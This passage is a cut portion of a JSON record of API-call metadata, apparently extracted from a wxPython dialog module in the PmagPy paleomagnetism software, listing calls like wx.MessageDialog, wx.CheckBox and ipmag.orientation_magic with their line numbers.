"os.path.join", "line_number": 3182, "usage_type": "call"}, {"api_name": "pmagpy.ipmag.orientation_magic", "line_number": 3188, "usage_type": "call"}, {"api_name": "pmagpy.ipmag", "line_number": 3188, "usage_type": "name"}, {"api_name": "wx.MessageDialog", "line_number": 3196, "usage_type": "call"}, {"api_name": "wx.OK", "line_number": 3196, "usage_type": "attribute"}, {"api_name": "wx.ICON_INFORMATION", "line_number": 3196, "usage_type": "attribute"}, {"api_name": "wx.MessageDialog", "line_number": 3203, "usage_type": "call"}, {"api_name": "wx.OK", "line_number": 3203, "usage_type": "attribute"}, {"api_name": "wx.ICON_INFORMATION", "line_number": 3203, "usage_type": "attribute"}, {"api_name": "wx.MessageDialog", "line_number": 3214, "usage_type": "call"}, {"api_name": "wx.OK", "line_number": 3214, "usage_type": "attribute"}, {"api_name": "wx.CANCEL", "line_number": 3214, "usage_type": "attribute"}, {"api_name": "wx.ID_OK", "line_number": 3216, "usage_type": "attribute"}, {"api_name": "wx.ID_CANCEL", "line_number": 3222, "usage_type": "attribute"}, {"api_name": "wx.Dialog", "line_number": 3229, "usage_type": "attribute"}, {"api_name": "wx.Panel", "line_number": 3240, "usage_type": "call"}, {"api_name": "wx.BoxSizer", "line_number": 3241, "usage_type": "call"}, {"api_name": "wx.VERTICAL", "line_number": 3241, "usage_type": "attribute"}, {"api_name": "wx.StaticBoxSizer", "line_number": 3247, "usage_type": "call"}, {"api_name": "wx.StaticBox", "line_number": 3247, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 3247, "usage_type": "attribute"}, {"api_name": "wx.VERTICAL", "line_number": 3247, "usage_type": "attribute"}, {"api_name": "wx.RadioButton", "line_number": 3250, "usage_type": "call"}, {"api_name": "wx.RB_GROUP", "line_number": 3250, "usage_type": "attribute"}, {"api_name": "wx.RadioButton", "line_number": 3253, "usage_type": "call"}, {"api_name": "wx.RadioButton", "line_number": 3256, "usage_type": "call"}, {"api_name": "wx.RadioButton", "line_number": 3259, "usage_type": "call"}, {"api_name": "wx.RadioButton", "line_number": 3262, "usage_type": "call"}, {"api_name": "wx.RadioButton", "line_number": 3265, "usage_type": "call"}, {"api_name": "wx.StaticBoxSizer", "line_number": 3272, "usage_type": "call"}, {"api_name": "wx.StaticBox", "line_number": 3272, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 3272, "usage_type": "attribute"}, {"api_name": "wx.VERTICAL", "line_number": 3272, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 3273, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 3273, "usage_type": "attribute"}, {"api_name": "wx.RadioButton", "line_number": 3276, "usage_type": "call"}, {"api_name": "wx.RB_GROUP", "line_number": 3276, "usage_type": "attribute"}, {"api_name": "wx.RadioButton", "line_number": 3277, "usage_type": "call"}, {"api_name": "wx.TextCtrl", "line_number": 3278, "usage_type": "call"}, {"api_name": "wx.CENTER", "line_number": 3278, "usage_type": "attribute"}, {"api_name": "wx.RadioButton", "line_number": 3279, "usage_type": "call"}, {"api_name": "wx.StaticBoxSizer", "line_number": 3296, "usage_type": "call"}, {"api_name": "wx.StaticBox", "line_number": 3296, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 3296, "usage_type": "attribute"}, {"api_name": "wx.VERTICAL", "line_number": 3296, "usage_type": "attribute"}, {"api_name": "wx.RadioButton", "line_number": 3299, "usage_type": "call"}, {"api_name": "wx.RB_GROUP", "line_number": 3300, "usage_type": "attribute"}, {"api_name": "wx.RadioButton", "line_number": 3303, "usage_type": "call"}, {"api_name": "wx.StaticBoxSizer", "line_number": 3313, "usage_type": "call"}, {"api_name": "wx.StaticBox", "line_number": 3313, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 3313, "usage_type": "attribute"}, {"api_name": "wx.HORIZONTAL", "line_number": 3313, "usage_type": "attribute"}, {"api_name": "wx.TextCtrl", "line_number": 3317, "usage_type": "call"}, {"api_name": "wx.CENTER", "line_number": 3317, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 3318, "usage_type": "call"}, {"api_name": "wx.TE_CENTER", "line_number": 3319, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 3328, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 3328, "usage_type": "attribute"}, {"api_name": "wx.Button", "line_number": 3329, "usage_type": "call"}, {"api_name": "wx.ID_OK", "line_number": 3329, "usage_type": "attribute"}, {"api_name": "wx.EVT_BUTTON", "line_number": 3330, "usage_type": "attribute"}, {"api_name": "wx.Button", "line_number": 3332, "usage_type": "call"}, {"api_name": "wx.ID_CANCEL", "line_number": 3332, "usage_type": "attribute"}, {"api_name": "wx.EVT_BUTTON", "line_number": 3333, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 3353, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 3353, "usage_type": "attribute"}, {"api_name": "wx.ID_CANCEL", "line_number": 3370, "usage_type": "attribute"}, {"api_name": "wx.MessageDialog", "line_number": 3396, "usage_type": "call"}, {"api_name": "wx.OK", "line_number": 3396, "usage_type": "attribute"}, {"api_name": "wx.ICON_INFORMATION", "line_number": 3396, "usage_type": "attribute"}, {"api_name": "wx.ID_OK", "line_number": 3421, "usage_type": "attribute"}, {"api_name": "wx.Dialog", "line_number": 3425, "usage_type": "attribute"}, {"api_name": "wx.Panel", "line_number": 3435, "usage_type": "call"}, {"api_name": "wx.BoxSizer", "line_number": 3436, "usage_type": "call"}, {"api_name": "wx.VERTICAL", "line_number": 3436, "usage_type": "attribute"}, {"api_name": "wx.StaticBoxSizer", "line_number": 3442, "usage_type": "call"}, {"api_name": "wx.StaticBox", "line_number": 3442, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 3442, "usage_type": "attribute"}, {"api_name": "wx.VERTICAL", "line_number": 3442, "usage_type": "attribute"}, {"api_name": "wx.CheckBox", "line_number": 3443, "usage_type": "call"}, {"api_name": "wx.CheckBox", "line_number": 3444, "usage_type": "call"}, {"api_name": "wx.CheckBox", "line_number": 3445, "usage_type": "call"}, {"api_name": "wx.CheckBox", "line_number": 3446, "usage_type": "call"}, {"api_name": "wx.CheckBox", "line_number": 3447, "usage_type": "call"}, {"api_name": "wx.CheckBox", "line_number": 3448, "usage_type": "call"}, {"api_name": "wx.CheckBox", "line_number": 3449, "usage_type": "call"}, {"api_name": "wx.CheckBox", "line_number": 3450, "usage_type": "call"}, {"api_name": "wx.CheckBox", "line_number": 3451, "usage_type": "call"}, {"api_name": "wx.CheckBox", "line_number": 3452, "usage_type": "call"}, {"api_name": "wx.BOTTOM", "line_number": 3456, "usage_type": "attribute"}, {"api_name": "wx.StaticBoxSizer", "line_number": 3462, "usage_type": "call"}, {"api_name": "wx.StaticBox", "line_number": 3462, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 3462, "usage_type": "attribute"}, {"api_name": "wx.VERTICAL", "line_number": 3462, "usage_type": "attribute"}, {"api_name": "wx.CheckBox", "line_number": 3463, "usage_type": "call"}, {"api_name": "wx.CheckBox", "line_number": 3464, "usage_type": "call"}, {"api_name": "wx.BOTTOM", "line_number": 3466, "usage_type": "attribute"}, {"api_name": "wx.BOTTOM", "line_number": 3467, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 3473, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 3473, "usage_type": "attribute"}, {"api_name": "wx.Button", "line_number": 3474, "usage_type": "call"}, {"api_name": "wx.ID_OK", "line_number": 3474, "usage_type": "attribute"}, {"api_name": "wx.EVT_BUTTON", "line_number": 3475, "usage_type": "attribute"}, {"api_name": "wx.Button", "line_number": 3477, "usage_type": "call"}, {"api_name": "wx.ID_CANCEL", "line_number": 3477, "usage_type": "attribute"}, {"api_name": "wx.EVT_BUTTON", "line_number": 3478, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 3491, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 3491, "usage_type": "attribute"}, {"api_name": "wx.ID_CANCEL", "line_number": 3500, "usage_type": "attribute"}, {"api_name": "wx.ID_OK", "line_number": 3545, "usage_type": "attribute"}]}